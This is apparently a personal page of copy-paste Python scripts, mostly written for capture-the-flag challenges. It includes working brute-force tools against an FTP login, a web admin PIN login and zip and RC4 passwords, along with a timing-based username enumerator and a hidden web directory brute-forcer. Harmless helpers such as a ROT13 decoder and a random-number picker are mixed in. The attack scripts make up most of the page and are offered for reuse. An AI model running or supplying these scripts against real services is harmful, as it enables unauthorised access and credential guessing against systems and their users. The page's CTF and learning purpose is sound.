Examples and Quick Scripts
This is a page of quick wins and scripts written to achieve certain goals. Copy/paste parts as needed!

Python

FTP Brute Force

Brute forces all passwords from words.txt for the username secure_usertry/except loop.
1
from ftplib import FTP
2
import time
3
​
4
ftp = FTP()
5
HOST = 'services.ftp.site'
6
PORT = 2121
7
ftp.set_debuglevel(2)
8
​
9
​
10
dictionary = 'words.txt'
11
password = None
12
​
13
with open(dictionary, 'r') as f:
14
for line in f.readlines():
15
password = line.strip('\n')
16
print('trying ' + password)
17
time.sleep(0.001)
18
try:
19
ftp.connect(HOST, PORT)
20
ftp.login(user='secure_user', passwd=password)
21
ftp.quit()
22
except:
23
pass
24
print(password)
Copied!

RC4 Brute Force

ARC4 brute forcing script written to try and decrypt a string. The decryption attempt is passed to another loop to try and determine if the string is readable ASCII or not. I chose not to pause or quit the loop because I was getting some false positives.
1
from arc4 import ARC4
2
​
3
cipher = b'\x55\x34\xe1\xb2\x17\xdc\x2a\xc5\x21\x26\x77\xe3\xae\x56\xed\x42\xc3\x28\x10\x40\x0a\xfc\xa2\x1d\xef\xab\x11\x1b\xc7'
4
​
5
with open("big_set.txt", "r") as keys:
6
for line in keys:
7
line = line.strip()
8
arc4 = ARC4(bytes(line, 'utf-8'))
9
new = arc4.decrypt(cipher)
10
try:
11
decoder = bytes.fromhex(new.hex()).decode('utf-8')
12
print("Key " + line + " made this:\n" + decoder)
13
except UnicodeDecodeError:
14
pass
Copied!

Zip File Brute Force Guess with B64 Password

This script will attempt to unzip an archive with a password from rockyou. This particular challenge said the password was base64 encoded, which is what the first part of the loop is for. Second part of loop is a try/except loop to pass the unzip error with wrong password.
Alternatively, one could get the zip hash then convert the rockyou list into base64 for each line - I chose to NOT do this to prevent having an extra rockyou file full of base64.
1
import base64
2
import zipfile
3
​
4
dictionary = '/mnt/d/hashcat-6.0.0/rockyou.txt'
5
​
6
with open(dictionary, 'r', errors='ignore') as f:
7
for line in f.readlines():
8
password = line.strip('\n')
9
#print(f'Raw password is {password}')
10
encoded = base64.b64encode(str.encode(password))
11
#print(f'Encoded password is {encoded}')
12
​
13
with zipfile.ZipFile('./base64.zip','r') as zip_ref:
14
try:
15
zip_ref.extractall(pwd=encoded)
16
print(f'Found! Password is {password}, encoded is {encoded}!')
17
quit()
18
except:
19
pass
Copied!

Connect to a Website, Establish Session, and Send Data

Establishing a session prevents multiple TCP connections from having to be opened. Additionally, taking the JSON and interpreting natively makes things useful!
1
import requests
2
import json
3
url = 'https://captcha.lol'
4
​
5
header = {'User-Agent':'bot'}
6
s = requests.Session()
7
r = s.get(url,headers=header)
8
​
9
ans = json.loads(r.text)
10
​
11
code = ans['code']
12
nonce = ans['nonce']
13
print(code)
14
print(nonce)
15
p = s.post(url, json=ans, headers=header)
16
​
17
print(p.text)
Copied!

PIN Brute Force for Web Login

This script adds a pin guess for a web login attempt. The pin is zfilled which makes 4 to 004. Additionally there’s a regular expression to find if access was denied or not and give what the PIN was while breaking out of the loop. A final print statement lets me know that they were all looped through, useful when I wasn't sure if my requests were properly formatted.
1
import urllib
2
import requests
3
import re
4
​
5
url = "https://vuln.server/admin_login"
6
​
7
pin = 0
8
​
9
while pin < 1000:
10
#headers = {'Cookie' : 'PHPSESSID=qhq84atma883hio9eso7hhsr4j'}
11
payload = {'email':'[email protected]','password':str(pin).zfill(3)}
12
req = requests.post(url, data=payload, allow_redirects=True)
13
if not re.findall('Access Denied', req.text):
14
print(f'\npin is {str(pin).zfill(3)}!\n')
15
break
16
print(str(pin).zfill(3), req.status_code, len(req.content))
17
pin = pin + 1
18
​
19
print('finished testing')
Copied!

Username Guessing based on Timing Analysis

This script pays attention to the timing between good usernames and bad ones to help determine if a username is valid.
1
import requests
2
from string import ascii_lowercase
3
with open('surnames.txt') as f:
4
lines = f.read().splitlines()
5
for lname in lines:
6
for init in ascii_lowercase:
7
username = init+lname
8
r = requests.post('http://m4lwhere.org/login.php', data = {'user':username,'pass':'haha'})
9
roundtrip = r.elapsed.total_seconds()
10
print(f'{roundtrip} for {username}')
Copied!

Connect to Raw Socket and Pass Data

This challenge required connecting to the socket and brute forcing the first byte back, I didn’t fully finish this challenge because it was a little frustrating. I need to spend more time on this script.
1
import socket
2
3
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
4
s.connect(('cfta-ne01.allyourbases.co',8017))
5
buf = s.recv(1024)
6
s.recv(1024)
7
conv = buf.decode('unicode-escape').encode('latin1').decode('UTF-8')
8
conv = conv + '\n'
9
print(conv)
10
s.sendall(bytes(conv, encoding='UTF-8'))
11
ans = s.recv(1024)
12
win = ans.decode('unicode-escape').encode('latin1').decode('UTF-8')
13
print(win)
14
s.close()
Copied!
1
import socket
2
import time
3
​
4
def connect():
5
s.connect(('challenges.ctf.lol',3008))
6
​
7
def recv():
8
recv = s.recv(1024)
9
print(recv)
10
​
11
for i in range(ord('A'),ord('z')+1):
12
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
13
print(f'trying {chr(i)}')
14
s.connect(('challenges.ctf.lol',30468))
15
recv = s.recv(1024)
16
print(recv)
17
s.sendall(bytes(chr(i), encoding='utf8'))
18
recv = s.recv(1024)
19
print(recv)
20
s.close()
Copied!

ROT13 Automatic Decoder

Written by Jess! Automatically finds the decoded input using the enchant library. Searches for legitimate words in the English dictionary, very cool!
1
import enchant
2
d = enchant.Dict("en_US")
3
​
4
cipher=input("Enter Caesar Shift Cipher to Decode: ")
5
for n in range(26):
6
decode=""
7
wordfound=""
8
for x in range(0,len(cipher)):
9
if ord(cipher[x]) in range(97,123):
10
decode+=(chr(((ord(cipher[x])-96+n)%26)+97))
11
elif ord(cipher[x]) in range(65,91):
12
decode+=(chr(((ord(cipher[x])-64+n)%26)+65))
13
elif ord(cipher[x])==(32):
14
checkword=d.check(decode)
15
if checkword:
16
wordfound=("Found!")
17
decode+=cipher[x]
18
else:
19
decode+=cipher[x]
20
check=d.check(decode)
21
print((n+1),decode,wordfound)
Copied!

Choose Random Numbers

This program chooses some random integers and assigns them to a string. Nothing fancy.
1
import random
2
​
3
series = random.randint(1,3)
4
​
5
book = random.randint(1,6)
6
​
7
page = random.randint(1,300)
8
​
9
print(f'Series {series}, Book {book}, Page {page}\n\n')
Copied!

List of all Characters from aa to zz :

Quick way to create a list of all possible lowercase values
1
from string import ascii_lowercase
2
for a in ascii_lowercase:
3
for b in ascii_lowercase:
4
print(a+b)
Copied!
Below is brute forcing all lowercase characters to find a hidden web dir
1
import requests
2
from string import ascii_lowercase
3
​
4
url = 'http://m4lwhere.org/'
5
​
6
for a in ascii_lowercase:
7
for b in ascii_lowercase:
8
for c in ascii_lowercase:
9
#print(a+b+c)
10
fullUrl = url + a + b + c
11
r = requests.get(fullUrl)
12
if r.status_code != 404:
13
print(f'Code {r.status_code} for {fullUrl}')
14
else:
15
pass
Copied!
Same one, just with a progress bar!
1
import requests
2
from progress.bar import Bar
3
from string import ascii_lowercase
4
​
5
url = 'http://m4lwhere.org/'
6
​
7
with Bar('Brute Forcing...', max=26*26*26-1) as bar:
8
for a in ascii_lowercase:
9
for b in ascii_lowercase:
10
for c in ascii_lowercase:
11
#print(a+b+c)
12
fullUrl = url + a + b + c
13
r = requests.get(fullUrl)
14
if r.status_code != 404:
15
print(f'\nCode {r.status_code} for {fullUrl}')
16
else:
17
bar.next()
18
pass
Copied!
Last modified 5mo ago
Copy link
Contents
Python